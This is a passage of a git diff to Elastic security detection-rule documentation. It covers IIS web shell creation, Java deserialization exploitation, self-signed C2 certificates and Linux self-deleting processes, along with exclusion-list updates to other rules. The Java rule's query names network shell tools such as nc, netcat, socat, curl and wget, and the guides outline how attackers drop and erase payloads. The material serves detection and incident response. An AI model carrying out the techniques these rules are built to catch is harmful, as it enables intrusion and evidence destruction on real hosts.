https://www.rapid7.com/blog/post/2024/10/30/investigating-a-sharepoint-compromise-ir-tales-from-the-field/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Data Source: Elastic Endgame +* Data Source: Elastic Defend +* Data Source: Sysmon +* Data Source: SentinelOne +* Data Source: Microsoft Defender XDR +* Data Source: Crowdstrike +* Resources: Investigation Guide + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Potential IIS Web Shell File Creation* + + +Web shells are malicious scripts uploaded to web servers, often exploiting vulnerabilities in web applications. Those files, used in Windows environments, can be manipulated by attackers to maintain persistence and execute arbitrary commands. Adversaries target specific directories for deploying these files. The detection rule identifies suspicious ASPX file creation in these directories, excluding legitimate processes, to flag potential web shell activity. + + +*Possible investigation steps* + + +- Review the file path where the ASPX/ASHX/ASMX file was created to confirm it matches the targeted directory pattern. This can help determine if the file is in a location commonly exploited for web shells. +- Examine the process that created the ASPX/ASHX/ASMX file to assess its legitimacy and potential malicious intent. +- Check the timestamp of the file creation event to correlate it with other suspicious activities or alerts on the host, which might provide additional context or evidence of compromise. +- Investigate the contents of the ASPX/ASHX/ASMX file to identify any malicious code or scripts that could indicate a web shell. Look for patterns or code snippets commonly associated with web shell functionality. +- Analyze network activity from the host around the time of the ASPX file creation to identify any unusual outbound connections or data transfers that might suggest communication with a command and control server. +- Review historical alerts and logs for the host to identify any previous suspicious activities or patterns that could indicate ongoing compromise or persistence mechanisms. + + +*False positive analysis* + + +- Routine updates or installations of legitimate web server components may trigger alerts. Users can create exceptions for known update processes or installation paths to reduce false positives. +- Development or testing environments often generate ASPX files as part of normal operations. Exclude directories or processes associated with these environments to prevent unnecessary alerts. +- Automated scripts or tools used for web server maintenance might create ASPX files. Identify and whitelist these scripts to avoid false detections. +- Legitimate third-party applications that integrate with web server extensions may create ASPX files. Monitor and whitelist these applications to ensure they do not trigger false positives. +- Scheduled tasks or system processes that interact with web server directories can be mistaken for malicious activity. Review and exclude these tasks if they are verified as non-threatening. + + +*Response and remediation* + + +- Isolate the affected server from the network to prevent further malicious activity and lateral movement. +- Terminate any suspicious processes associated with the creation of the ASPX file, especially those not originating from legitimate executables like msiexec.exe. +- Remove the identified ASPX file from the targeted directory to eliminate the potential web shell. +- Conduct a thorough scan of the server using updated antivirus and endpoint detection tools to identify and remove any additional malicious files or processes. +- Review server logs and network traffic for signs of unauthorized access or data exfiltration, and document any findings for further analysis. +- Restore the server from a known good backup if necessary, ensuring that the backup is free from any malicious artifacts. +- Escalate the incident to the security operations team for further investigation and to assess the need for additional security measures, such as patching vulnerabilities or enhancing monitoring capabilities. + + +==== Setup + + + +*Setup* + + +This rule is designed for data generated by https://www.elastic.co/security/endpoint-security[Elastic Defend], which provides native endpoint detection and response, along with event enrichments designed to work with our detection rules. + +Setup instructions: https://ela.st/install-elastic-defend + + +*Additional data sources* + + +This rule also supports the following third-party data sources. For setup instructions, refer to the links below: + +- https://ela.st/crowdstrike-integration[CrowdStrike] +- https://ela.st/m365-defender[Microsoft Defender XDR] +- https://ela.st/sentinel-one-cloud-funnel[SentinelOne Cloud Funnel] +- https://ela.st/sysmon-event-11-setup[Sysmon Event ID 11 - File Create] + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "windows" and event.type != "deletion" and file.extension : ("aspx", "ashx", "asmx") and + process.name : ("w3wp.exe", "MSExchangeMailboxReplication.exe", "EdgeTransport.exe", "Microsoft.Exchange.*.exe", "UMWorkerProcess.exe", "umservice.exe", "cmd.exe", "powershell.exe", "pwsh.exe", "certutil.exe", "xcopy.exe") and + ( + (file.path : ("?:\\Program Files\\Common Files\\microsoft shared\\Web Server Extensions\\*\\TEMPLATE\\LAYOUTS\\*", + "?:\\inetpub\\wwwroot\\aspnet_client\\system_web\\*", + "?:\\Program Files\\Microsoft\\Exchange Server\\V*\\FrontEnd\\HttpProxy\\owa\\auth\\*", + "?:\\Program Files\\Microsoft\\Exchange Server\\V*\\FrontEnd\\HttpProxy\\ecp\\auth\\*") and + /* not sub-dirs */ + not file.path : ("?:\\inetpub\\wwwroot\\aspnet_client\\system_web\\*\\*", + "?:\\Program Files\\Microsoft\\Exchange Server\\V*\\FrontEnd\\HttpProxy\\*\\auth\\*\\*", + "?:\\Program Files\\Common Files\\microsoft shared\\Web Server Extensions\\*\\TEMPLATE\\LAYOUTS\\*\\*")) or + + /* not sub-dirs */ + (file.path : "?:\\inetpub\\wwwroot\\aspnet_client\\*" and not file.path : "?:\\inetpub\\wwwroot\\aspnet_client\\*\\*") + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Server Software Component +** ID: T1505 +** Reference URL: https://attack.mitre.org/techniques/T1505/ +* Sub-technique: +** Name: Web Shell +** ID: T1505.003 +** Reference URL: https://attack.mitre.org/techniques/T1505/003/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-java-service-exploitation-via-suspicious-child-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-java-service-exploitation-via-suspicious-child-process.asciidoc new file mode 100644 index 0000000000..42cd44035e --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/potential-java-service-exploitation-via-suspicious-child-process.asciidoc @@ -0,0 +1,163 @@ +[[potential-java-service-exploitation-via-suspicious-child-process]] +=== Potential Java Service Exploitation via Suspicious Child Process + +Identifies a Java process that accepts an inbound network connection and then spawns a suspicious child process. This may indicate exploitation of a Java service that runs attacker-controlled code, such as one that deserializes untrusted objects. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.lunasec.io/docs/blog/log4j-zero-day/ +* https://github.com/christophetd/log4shell-vulnerable-app +* https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf +* https://www.elastic.co/security-labs/detecting-log4j2-with-elastic-security +* https://www.elastic.co/security-labs/analysis-of-log4shell-cve-2021-45046 +* https://archive.ph/Xowgn + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* OS: macOS +* Use Case: Threat Detection +* Tactic: Execution +* Use Case: Vulnerability +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 109 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Potential Java Service Exploitation via Suspicious Child Process* + + +Some Java services accept inbound connections and deserialize untrusted objects, such as a leftover Log4j socket or collector that rebuilds serialized `LogEvent` objects through `FilteredObjectInputStream`. If that path can be reached, an attacker can send a crafted payload to the listening port and get the JVM to run attacker-controlled code. This rule looks for a Java process that accepts an inbound connection on a service port from an ephemeral source port, then quickly starts a suspicious child process (shell, interpreter, curl, or wget) whose working directory is under `/opt`. That sequence is consistent with remote code execution against a Java listener rather than a normal outbound application callback. + + +*Possible investigation steps* + + +- Confirm the inbound `connection_accepted` event: Java was the accepting process, `network.direction` is ingress, the destination port is a service port (below 49152), and the source port is ephemeral (32768 or higher on Linux; 49152 or higher is typical on macOS). +- Identify the source IP and determine whether it is expected to talk to this Java service. Internal sources still matter; a collector or socket server exposed only on a private network can still be used for lateral movement. +- Review the child process that started within a few seconds of the accepted connection. Check `process.name`, `process.command_line`, `process.working_directory`, and the parent/child PID relationship to Java. +- Inspect the Java process command line and working directory to see which application accepted the connection (for example a service under `/opt`) and whether it is a known listener that deserializes input. +- Look for follow-on activity on the same host after the child process: additional shells, file writes under `/tmp` or `/opt`, new outbound connections, or persistence changes. +- Correlate with other alerts on the same host or user around the same time to see whether this is isolated or part of a broader intrusion. + + +*False positive analysis* + + +- Java services installed may spawn shells or interpreters during install, upgrade, health checks, or administrative scripts. Confirm whether the child command line matches a known maintenance pattern before treating the alert as malicious. +- Some already-excluded patterns include Flutter tooling, Jira helper scripts, and trivial `bash -c` probes such as `ulimit` or `echo $$`. Add similar exceptions for other trusted `/opt` applications when the parent Java process and command line are stable. +- Development or lab collectors that intentionally accept serialized Java objects will match this rule if they also start a shell. Restrict those hosts or exclude the specific service path if that activity is expected. +- Containerized or non-`/opt` Java applications are outside this rule's working-directory constraint and should not be tuned here; investigate those with a broader hunt if needed. + + +*Response and remediation* + + +- Isolate the affected host from the network to stop further inbound exploitation and limit lateral movement. +- Stop the suspicious child processes and, if exploitation is confirmed, stop the Java listener that accepted the connection until it can be patched or removed. +- Capture the Java process command line, listening port, child process command line, and inbound source IP for scoping. +- Hunt for the same source IP, the same Java service path, and similar child processes on other hosts. +- Remove or disable unused Java socket servers, collectors, or sample bridges that deserialize untrusted input. Patch remaining Java applications and apply a JVM-wide serialization filter where deserialization cannot be avoided. +- Restore from a known-good backup if unauthorized files, persistence, or additional malware are found. +- Escalate to the security operations center or incident response team if the inbound source, child process, or follow-on activity indicates a successful compromise. + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id with maxspan=5s + [network where event.action == "connection_accepted" and network.direction == "ingress" and + + process.name : "java" and + destination.port < 49152 and source.port >= 32768] by process.pid + [process where event.type == "start" and + + /* Suspicious JAVA child process */ + process.parent.name : "java" and + process.name : ( + "sh", "bash", "dash", "ksh", "tcsh", "zsh", "ash", "mksh", "busybox", + "curl", "wget", "perl*", "python*", "ruby*", "php*", "lua*", "socat", + "nc", "ncat", "netcat", "netcat.openbsd", "netcat.traditional", "nc.openbsd", + "nc.traditional", "nohup", "setsid", "disown", "hostname", "whoami", "id" + ) and + not process.command_line like~ ( + "bash -c ulimit -u", + "bash /opt/flutter/bin/flutter*", + "bash -c echo $$", + "/bin/bash /opt/python3/bin/jira*", + "/bin/sh -c env LC_ALL=C /usr/sbin/lpc status*" + )] by process.parent.pid + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ +* Sub-technique: +** Name: Python +** ID: T1059.006 +** Reference URL: https://attack.mitre.org/techniques/T1059/006/ +* Sub-technique: +** Name: JavaScript +** ID: T1059.007 +** Reference URL: https://attack.mitre.org/techniques/T1059/007/ +* Technique: +** Name: Exploitation for Client Execution +** ID: T1203 +** Reference URL: https://attack.mitre.org/techniques/T1203/ +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Exploit Public-Facing Application +** ID: T1190 +** Reference URL: https://attack.mitre.org/techniques/T1190/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-system32-dll.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-system32-dll.asciidoc index d23b2232bf..66580f3bee 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-system32-dll.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-system32-dll.asciidoc @@ -31,7 +31,7 @@ Identifies suspicious instances of default system32 DLLs either unsigned or sign * Tactic: Persistence * Resources: Investigation Guide -*Version*: 111 +*Version*: 112 *Rule authors*: @@ -138,7 +138,7 @@ library where host.os.type == "windows" and event.action == "load" and ) or ( dll.name : ("timeSync.dll", "appInfo.dll") and dll.code_signature.subject_name in ( - "VMware Inc.", "VMware, Inc." + "VMware Inc.", "VMware, Inc.", "Broadcom Inc" ) and dll.code_signature.trusted == true ) or ( diff --git a/docs/detections/prebuilt-rules/rule-details/potential-privacy-control-bypass-via-tccdb-modification.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-privacy-control-bypass-via-tccdb-modification.asciidoc index 0adbb73276..eb526590ab 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-privacy-control-bypass-via-tccdb-modification.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-privacy-control-bypass-via-tccdb-modification.asciidoc @@ -34,11 +34,12 @@ Identifies the use of sqlite3 to directly modify the Transparency, Consent, and * Data Source: Elastic Defend * Resources: Investigation Guide -*Version*: 114 +*Version*: 115 *Rule authors*: * Elastic +* Massimo Bertocchi *Rule license*: Elastic License v2 diff --git a/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-suid-sgid.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-suid-sgid.asciidoc index 23d718726c..37decefabe 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-suid-sgid.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-suid-sgid.asciidoc @@ -32,7 +32,7 @@ Detects potential privilege escalation under the root effective user when the re * Tactic: Privilege Escalation * Resources: Investigation Guide -*Version*: 2 +*Version*: 3 *Rule authors*: @@ -92,12 +92,18 @@ process where host.os.type == "linux" and event.type == "start" and event.action ) ) and not ( + /* Common SUID/SGID binaries (subset also covered by e7856173-6489-449f-80ec-c1f5fcd7b87c); excluded here to reduce noise */ + process.name in ( + "unix_chkpwd", "fusermount", "fusermount3", "umount", "newgrp", "chsh", "sudoedit", "gpasswd", "chfn", "polkit-agent-helper-1", + "dbus-daemon-launch-helper", "ssh-keysign", "pam_extrausers_chkpwd", "expiry", "chage", "wall", "bsd-write", "ssh-agent", + "ping6", "traceroute", "mtr", "ntfs-3g", "Xorg.wrap", "chrome-sandbox", "bwrap", "hostname", "sudo", "su", "pkexec", "passwd", + "mount" + ) or (process.executable == "/usr/lib/landscape/apt-update" and process.args == "/usr/lib/landscape/apt-update") or (process.executable == "/usr/bin/mount" and process.args in ("/usr/bin/mount", "mount")) or (process.executable like "/u0?/app/agent/agent_*/sbin/nmo" and process.args like "/u0?/app/agent/agent_*/sbin/nmo") or (process.executable == "/usr/bin/screen" and process.args == "screen") or - (process.executable == "/usr/sbin/playpen" and process.args == "/usr/sbin/playpen") or - process.executable == "/usr/bin/sudo" + (process.executable == "/usr/sbin/playpen" and process.args == "/usr/sbin/playpen") ) ---------------------------------- @@ -116,7 +122,3 @@ not ( ** Name: Setuid and Setgid ** ID: T1548.001 ** Reference URL: https://attack.mitre.org/techniques/T1548/001/ -* Sub-technique: -** Name: Sudo and Sudo Caching -** ID: T1548.003 -** Reference URL: https://attack.mitre.org/techniques/T1548/003/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-unshare-and-uid-change.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-unshare-and-uid-change.asciidoc index 1f5b4a24e4..8b85910fb5 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-unshare-and-uid-change.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-unshare-and-uid-change.asciidoc @@ -34,11 +34,12 @@ Identifies potentially suspicious use of unshare to create a user namespace cont * Data Source: Elastic Defend * Resources: Investigation Guide -*Version*: 12 +*Version*: 13 *Rule authors*: * Elastic +* Massimo Bertocchi *Rule license*: Elastic License v2 diff --git a/docs/detections/prebuilt-rules/rule-details/potential-self-signed-tls-certificate-recently-issued-on-external-connection.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-self-signed-tls-certificate-recently-issued-on-external-connection.asciidoc new file mode 100644 index 0000000000..e7cf64bd94 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/potential-self-signed-tls-certificate-recently-issued-on-external-connection.asciidoc @@ -0,0 +1,247 @@ +[[potential-self-signed-tls-certificate-recently-issued-on-external-connection]] +=== Potential Self-Signed TLS Certificate Recently Issued on External Connection + +Identifies completed outbound TLS connections to external destinations where the server presents a recently issued, likely self-signed certificate whose issuer and subject distinguished names are equal. C2 frameworks frequently use freshly generated self-signed certificates instead of publicly trusted CAs. This behavioral logic complements hash-based C2 certificate rules, such as default Cobalt Strike team-server certificates, by catching rotated or custom infrastructure that does not reuse default tooling certificates. Distinguished-name equality identifies self-issued certificates but does not cryptographically prove that the certificate signed itself. The rule does not cover private-CA signed certificates, where issuer and subject differ, or C2 that uses publicly trusted certificates such as Let's Encrypt. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/docs/reference/beats/packetbeat/configuration-tls +* https://www.elastic.co/docs/reference/ecs/ecs-x509 +* https://www.elastic.co/security-labs/collecting-cobalt-strike-beacons-with-the-elastic-stack + +*Tags*: + +* Domain: Network +* Use Case: Network Security Monitoring +* Use Case: Threat Detection +* Tactic: Command and Control +* Rule Type: ESQL +* Data Source: Network Packet Capture +* Data Source: Network Traffic +* Resources: Investigation Guide + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Potential Self-Signed TLS Certificate Recently Issued on External Connection* + + +Malware and post-exploitation C2 often ships with ephemeral, self-signed TLS certificates rather than CA-issued +credentials. This rule matches external, successfully established TLS sessions where the server certificate issuer +matches the subject (self-issued and commonly self-signed) and the `not_before` date falls between 30 days ago and the +current time. Matching sessions are aggregated by source IP, destination IP, subject DN, and certificate `not_before` +so repeated full handshakes in the same detection window collapse into one alert. Distinguished-name equality alone +does not cryptographically verify the certificate signature. + +This logic does not detect private-CA signed leaves (issuer DN differs from subject DN) or publicly trusted certificates. +Hash-based default-certificate rules remain complementary coverage for known tooling certs that are often years old. +Resumed TLS sessions typically omit `tls.server.x509.*` fields, so only full handshakes are eligible. + + +*Possible investigation steps* + + +- Review `source.ip`, `destination.ip`, `Esql.destination_port_values`, `tls.server.x509.subject.distinguished_name`, + `Esql.tls_server_x509_serial_number_values`, `tls.server.x509.not_before`, and `Esql.tls_client_server_name_values`. + Common names can be empty on self-signed certificates; prefer the distinguished name and serial. +- Compare SNI (`Esql.tls_client_server_name_values`) with the certificate subject. A mismatch is a useful pivot, not + proof of malice. +- Pivot on destination IP and certificate serial or available SHA-1/SHA-256 fingerprints across other internal sources: + ```esql + FROM logs-network_traffic.tls-* + | WHERE tls.established == true + AND tls.server.x509.issuer.distinguished_name == tls.server.x509.subject.distinguished_name + | STATS event_count = COUNT(*), hosts = MV_SLICE(VALUES(source.ip), 0, 99) + BY destination.ip, tls.server.x509.serial_number, tls.server.hash.sha1, tls.server.hash.sha256 + | SORT event_count DESC + ``` +- Correlate with endpoint alerts, DNS anomalies, or prior commodity C2 detections on the source host, including the + Default Cobalt Strike Team Server Certificate rule. +- Compare certificate age and validity window against expected vendor or ACME renewal patterns. ACME-issued public + certificates should not match this rule because they are not self-signed. + + +*False positive analysis* + + +- Internal developers testing against staging servers with self-signed certs may appear if traffic hairpins through + external IPs or if staging is hosted outside RFC1918 / ULA space. +- Newly published self-hosted services (Proxmox, NAS, cameras, small-business appliances) often generate a self-signed + certificate on first boot and will match for 30 days. Exclude by destination after validation. +- Some appliance vendors ship with short-lived factory self-signed certificates; exclude by destination after validation. +- Repeated alerts for the same source, destination, and certificate across intervals are expected while the certificate + remains inside the 30-day `not_before` window. Add a destination or serial exception after the first review if the + traffic is authorized. + + +*Response and remediation* + + +- Isolate the source host if the destination is unknown and no authorized workflow explains the session. +- Block the destination IP or domain at the perimeter pending investigation. +- Preserve the available certificate hashes, `Esql.tls_server_x509_serial_number_values`, and the subject DN for threat + intel sharing. Collect a PCAP or full TLS metadata sample when available. + + +==== Setup + + + +*Setup* + + +This rule requires TLS certificate metadata from the Elastic network_traffic integration +(`logs-network_traffic.tls-*`) with `send_certificates` enabled (the Packetbeat TLS default) so ECS fields under +`tls.server.x509.*` are populated, including `issuer.distinguished_name`, `subject.distinguished_name`, and +`not_before`. + +Packetbeat calculates SHA-1 certificate fingerprints by default. To populate `tls.server.hash.sha256`, add `sha256` to +the TLS protocol analyzer's `fingerprints` setting. + +Resumed TLS sessions typically do not include certificate fields and will not match. Legacy `packetbeat-*` indices are +intentionally not queried: this rule uses CIDR-based internal-to-external directionality that should be validated per +source mapping before claiming Packetbeat coverage. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-network_traffic.tls-* +| where + network.protocol == "tls" + and network.transport == "tcp" + and tls.established == true + and source.ip is not null + and destination.ip is not null + and tls.server.x509.not_before is not null + and tls.server.x509.issuer.distinguished_name is not null + and tls.server.x509.subject.distinguished_name is not null + and tls.server.x509.issuer.distinguished_name == tls.server.x509.subject.distinguished_name + and tls.server.x509.not_before >= now() - 30 days + and tls.server.x509.not_before <= now() + and CIDR_MATCH( + source.ip, + "10.0.0.0/8", + "100.64.0.0/10", + "172.16.0.0/12", + "192.168.0.0/16", + "fc00::/7" + ) + and not CIDR_MATCH( + destination.ip, + "0.0.0.0/8", + "10.0.0.0/8", + "100.64.0.0/10", + "127.0.0.0/8", + "169.254.0.0/16", + "172.16.0.0/12", + "192.0.0.0/24", + "192.0.2.0/24", + "192.168.0.0/16", + "192.175.48.0/24", + "192.31.196.0/24", + "192.52.193.0/24", + "192.88.99.0/24", + "198.18.0.0/15", + "198.51.100.0/24", + "203.0.113.0/24", + "224.0.0.0/4", + "240.0.0.0/4", + "::/128", + "::1/128", + "2001:db8::/32", + "fc00::/7", + "fe80::/10", + "ff00::/8" + ) +| stats + Esql.event_count = COUNT(*), + Esql.first_seen = MIN(@timestamp), + Esql.last_seen = MAX(@timestamp), + Esql.destination_port_values = MV_SLICE(VALUES(destination.port), 0, 9), + Esql.tls_client_server_name_values = MV_SLICE(VALUES(tls.client.server_name), 0, 9), + Esql.tls_server_x509_subject_common_name_values = MV_SLICE(VALUES(tls.server.x509.subject.common_name), 0, 9), + Esql.tls_server_x509_serial_number_values = MV_SLICE(VALUES(tls.server.x509.serial_number), 0, 4), + Esql.tls_server_hash_sha1_values = MV_SLICE(VALUES(tls.server.hash.sha1), 0, 4), + Esql.tls_server_hash_sha256_values = MV_SLICE(VALUES(tls.server.hash.sha256), 0, 4), + Esql.tls_server_x509_not_after_values = MV_SLICE(VALUES(tls.server.x509.not_after), 0, 4), + Esql.network_community_id_values = MV_SLICE(VALUES(network.community_id), 0, 9), + Esql.host_name_values = MV_SLICE(VALUES(host.name), 0, 9), + Esql.observer_name_values = MV_SLICE(VALUES(observer.name), 0, 19) + by + source.ip, + destination.ip, + tls.server.x509.subject.distinguished_name, + tls.server.x509.not_before +| keep + source.ip, + destination.ip, + tls.server.x509.subject.distinguished_name, + tls.server.x509.not_before, + Esql.event_count, + Esql.first_seen, + Esql.last_seen, + Esql.destination_port_values, + Esql.tls_client_server_name_values, + Esql.tls_server_x509_subject_common_name_values, + Esql.tls_server_x509_serial_number_values, + Esql.tls_server_hash_sha1_values, + Esql.tls_server_hash_sha256_values, + Esql.tls_server_x509_not_after_values, + Esql.network_community_id_values, + Esql.host_name_values, + Esql.observer_name_values + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ +* Technique: +** Name: Encrypted Channel +** ID: T1573 +** Reference URL: https://attack.mitre.org/techniques/T1573/ +* Sub-technique: +** Name: Asymmetric Cryptography +** ID: T1573.002 +** Reference URL: https://attack.mitre.org/techniques/T1573/002/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-timestomp-in-executable-files.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-timestomp-in-executable-files.asciidoc index daab303fa1..cbf7224d64 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-timestomp-in-executable-files.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-timestomp-in-executable-files.asciidoc @@ -31,7 +31,7 @@ Identifies the modification of a file creation time for executable files in sens * Data Source: Sysmon * Resources: Investigation Guide -*Version*: 111 +*Version*: 112 *Rule authors*: @@ -139,12 +139,26 @@ file where host.os.type == "windows" and not process.executable : ( "?:\\Program Files\\*", "?:\\Program Files (x86)\\*", + "?:\\ProgramData\\Microsoft\\Windows Defender\\*", "?:\\Windows\\system32\\cleanmgr.exe", "?:\\Windows\\system32\\msiexec.exe", "?:\\Windows\\syswow64\\msiexec.exe", "?:\\Windows\\system32\\svchost.exe", "?:\\Windows\\System32\\Robocopy.exe", - "?:\\Windows\\SysWOW64\\Robocopy.exe" + "?:\\Windows\\SysWOW64\\Robocopy.exe", + "?:\\Windows\\explorer.exe", + "?:\\Windows\\system32\\Dism.exe", + "?:\\Windows\\system32\\DFSRs.exe", + "?:\\Windows\\system32\\wbengine.exe", + "?:\\Windows\\system32\\CompatTelRunner.exe", + "?:\\Windows\\system32\\SearchIndexer.exe", + "?:\\Windows\\system32\\wuauclt.exe", + "?:\\Windows\\servicing\\TrustedInstaller.exe", + "?:\\Windows\\WinSxS\\*\\TiWorker.exe", + "?:\\Windows\\Microsoft.NET\\*", + "?:\\Windows\\SystemApps\\*", + "?:\\Windows\\uus\\*\\wuaucltcore.exe", + "?:\\$WINDOWS.~BT\\Sources\\mighost.exe" ) and not (process.executable : "?:\\Windows\\System32\\spoolsv.exe" and file.path : "?:\\Windows\\System32\\spool\\*") and not user.name : ("SYSTEM", "Local Service", "Network Service") diff --git a/docs/detections/prebuilt-rules/rule-details/process-execution-followed-by-self-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/process-execution-followed-by-self-deletion.asciidoc new file mode 100644 index 0000000000..dbfdffd90f --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/process-execution-followed-by-self-deletion.asciidoc @@ -0,0 +1,151 @@ +[[process-execution-followed-by-self-deletion]] +=== Process Execution Followed by Self-Deletion + +Detects a process execution followed by immediate self-deletion, a common technique used by adversaries to remove traces of their activity on the system. This pattern is often observed in malware and APT campaigns. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process* +* logs-endpoint.events.file* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Process Execution Followed by Self-Deletion* + + +This rule detects a Linux process launched from a temporary, shared-memory, web, or file-descriptor path whose executable is deleted within 30 seconds, a pattern that can erase evidence and hinder analysis. An attacker may drop a payload in `/dev/shm`, execute it to establish access or run malicious commands, and immediately unlink the file while the process continues running. + + +*Possible investigation steps* + + +- Reconstruct the process tree and review the command line, user, working directory, execution context, and parent legitimacy to determine whether the activity was expected. +- If the process remains active, preserve volatile evidence such as its executable through `/proc//exe`, memory, open file descriptors, and cryptographic hashes before containment. +- Correlate nearby child processes, file modifications, persistence changes, DNS requests, and network connections to identify payload behavior and command-and-control activity. +- Trace how the executable reached the host using file-creation events, download records, shell activity, web-server logs, authentication events, and relevant audit telemetry. +- Search the environment for the same hash, command line, user, parent process, destination infrastructure, or deletion pattern, then isolate affected hosts and revoke exposed credentials when malicious activity is confirmed. + + +*False positive analysis* + + +- Legitimate installation, update, or maintenance scripts may execute a temporary helper from `/tmp`, `/var/tmp`, or `/run` and remove it after completion; verify the parent process, package or change records, signer or hash reputation, and timing against approved activity. +- Administrators or applications may intentionally run short-lived executables from shared memory, web directories, or file descriptors and unlink them immediately; confirm the initiating user, command line, expected application workflow, and absence of suspicious child processes or network activity. + + +*Response and remediation* + + +- Isolate affected Linux hosts from the network while preserving access for responders, and terminate malicious processes after capturing `/proc//exe`, memory, open file descriptors, hashes, and active connections. +- Remove related payloads and persistence from cron jobs, systemd units, shell profiles, SSH `authorized_keys`, startup scripts, web directories, temporary paths, and shared-memory locations. +- Revoke or rotate credentials, API keys, SSH keys, and session tokens used by the malicious process or exposed on the host, and block identified hashes, domains, IP addresses, and download sources. +- Reimage the host or restore it from a verified known-good backup when system integrity cannot be established, then validate packages, configurations, accounts, services, and security tooling before reconnecting it. +- Escalate to incident response immediately if the same payload or infrastructure appears on multiple hosts, privileged accounts were accessed, persistence is present, or command-and-control or data-exfiltration activity is identified. +- Prevent recurrence by restricting execution from `/tmp`, `/var/tmp`, `/dev/shm`, and web-writable directories where operationally feasible, correcting unsafe permissions, patching the initial access vector, and deploying detections for related hashes and behaviors. + + +==== Setup + + + +*Setup* 